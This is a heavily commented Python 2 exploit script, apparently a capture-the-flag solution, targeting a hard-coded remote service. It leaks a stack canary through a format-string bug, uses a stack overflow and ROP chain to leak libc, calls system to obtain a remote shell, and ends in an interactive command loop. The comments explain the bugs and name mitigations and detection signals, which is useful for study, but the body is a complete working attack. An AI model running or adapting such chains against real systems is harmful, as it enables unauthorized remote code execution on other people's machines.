- import socket
- import time
- import struct
- import re
# Module-level side effect: a blocking TCP connection to one hard-coded
# host/port is opened as soon as the script runs, before any helper below
# is defined.  No timeout is set on the socket, so the recv() calls made
# through R() below have no upper bound on how long they block.
sk = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sk.connect(('202.120.7.68',23333))
def R():
    """Receive one chunk from the module-level socket ``sk``.

    A single ``recv`` call with a 40960-byte ceiling; whatever it returns
    (possibly less than a full message, possibly an empty string once the
    peer has closed) is handed back unchanged.  No framing is done here.
    """
    chunk = sk.recv(40960)
    return chunk
def S(x):
    """Send ``x`` over the module-level socket ``sk``.

    The byte count that ``send`` reports is discarded, so a short write
    goes unnoticed by the caller.  Returns ``None``.
    """
    _bytes_out = sk.send(x)  # return value intentionally not used
def PD(x):
    """Pack ``x`` as a native-order, native-size unsigned int (format ``'I'``).

    Returns the packed bytes (a ``str`` on Python 2).  ``struct.error`` is
    raised when ``x`` is negative or does not fit the field.
    """
    packer = struct.Struct('I')
    return packer.pack(x)
def DR():
    """Receive until a chunk contains the marker ``'Quit'`` + newline.

    Every chunk read through ``R()`` is kept and the concatenation of all
    of them is returned once the marker shows up.  The marker is only
    looked for inside the most recent chunk, so one split across two
    ``recv`` results is missed; an empty chunk (peer closed) is not an end
    condition either, so the loop then spins on ``recv``.
    """
    chunks = []
    while True:
        chunk = R()
        chunks.append(chunk)
        if 'Quit\n' in chunk:
            return ''.join(chunks)
# Stage 1: drain the banner up to the 'Quit' marker, then send menu option
# '1', a packed 4-byte address and a printf-style format string containing
# %x / %hn conversions.  Attacker-controlled text reaching a printf-family
# format argument is the classic format-string bug; the server-side fix is
# to never pass user input as the format (compile with -Wformat-security,
# and _FORTIFY_SOURCE refuses %n-family conversions in writable formats).
DR()
S('1\n'+PD(0x0804B009)+'%35$x%10$hn\n')
# The reply is expected to contain "Mr./Mrs. ", four arbitrary bytes and a
# hex string; that hex string is parsed as a 32-bit value and re-packed.
# The script labels it 'StackGuard', i.e. it treats the value as the remote
# process's stack canary.  re.findall(...)[0] raises IndexError when the
# pattern does not match (service changed or patched).
magic = PD(int(re.findall('Mr\./Mrs\. ....([0-9a-f]*)\n',DR())[0],16))
# Python 2 only: print statement and str.encode('hex').
print 'StackGuard:', magic.encode('hex')
# Fixed addresses for one specific binary and libc build.  Values in the
# 0x0804xxxx range are typical of a non-PIE 32-bit ELF image; the *_off
# values are offsets inside libc and only hold for the exact library the
# remote side runs.  Any rebuild, a different libc, or PIE invalidates all
# of them -- position-independent builds are what make such hard-coded
# addresses unusable.  (Roles below are inferred from the names only.)
query_text = 0x08048971   # presumably an address inside the binary image
puts_plt = 0x08048520     # presumably the PLT stub for puts
read_got = 0x0804AFC4     # presumably the GOT slot of read
read_off = 0x000db4b0     # offset of read in libc; used below to derive libc_base
gets_off = 0x00065560     # offset of gets in libc
system_off = 0x00040100   # offset of system in libc
pop_ret = 0x08048C3F      # defined but not referenced anywhere in this script
# Stage 2: menu option '2', 0x100 filler bytes, the value leaked in stage 1
# placed right after the filler, three zero words, then three packed
# addresses (puts_plt, query_text, read_got).  This is a fixed-size stack
# buffer being overrun past its canary; it only proceeds because stage 1
# recovered that canary.  Bounds-checking the 0x100-byte input, or a canary
# that cannot be leaked, stops the script at this point.
S('2\n' + 'A'*0x100 + magic + PD(0) + PD(0) + PD(0) +
  PD(puts_plt) + PD(query_text) + PD(read_got) +
  '\n')
# A fixed pause rather than reading up to a marker: the single R() below
# returns whatever arrived within 0.5 s, so a slow reply breaks the parse.
time.sleep(0.5)
# The reply is expected to contain "library :'(" + newline followed by four
# raw bytes, unpacked as a 32-bit address of read inside the remote libc.
# Subtracting read's known offset yields the library load address.
read_libc = struct.unpack('I',re.findall('library :\'\(\n(....)',R())[0])[0]
libc_base = read_libc - read_off
# Python 2 print statement.
print 'libc_base:', hex(libc_base)
# Stage 3: resolve gets and system relative to the libc_base found above,
# then send the same overflow layout as stage 2 (filler, leaked value, three
# zero words) followed by gets_libc, system_libc and two copies of a fixed
# writable address.  Unlike stage 2, no menu selection precedes the payload.
# gets() is unbounded input by definition; modern toolchains warn on or
# refuse it, and the same bounds check that stops stage 2 stops this.
gets_libc = gets_off + libc_base
system_libc = system_off + libc_base
S('A'*0x100 + magic + PD(0) + PD(0) + PD(0) +
  PD(gets_libc) + PD(system_libc) + PD(0x0804B008) + PD(0x0804B008) +
  '\n')
# Fixed wait, then print whatever single chunk is available (Python 2 print).
time.sleep(0.5)
print R()
# Interactive tail: 'sh' is sent first (presumes stage 3 left the remote
# side reading a command), then each line typed at the '$ ' prompt is
# forwarded and one chunk of the reply printed after a fixed 0.5 s wait.
# On a monitored host, a network-facing service spawning a shell is a
# strong detection signal (process-tree rules in auditd/EDR).  raw_input
# and the print statement are Python 2 only; the loop has no exit
# condition of its own (EOFError/KeyboardInterrupt or a socket error end it).
S('sh\n')
while True:
    S(raw_input('$ ')+'\n')
    time.sleep(0.5)
    print R()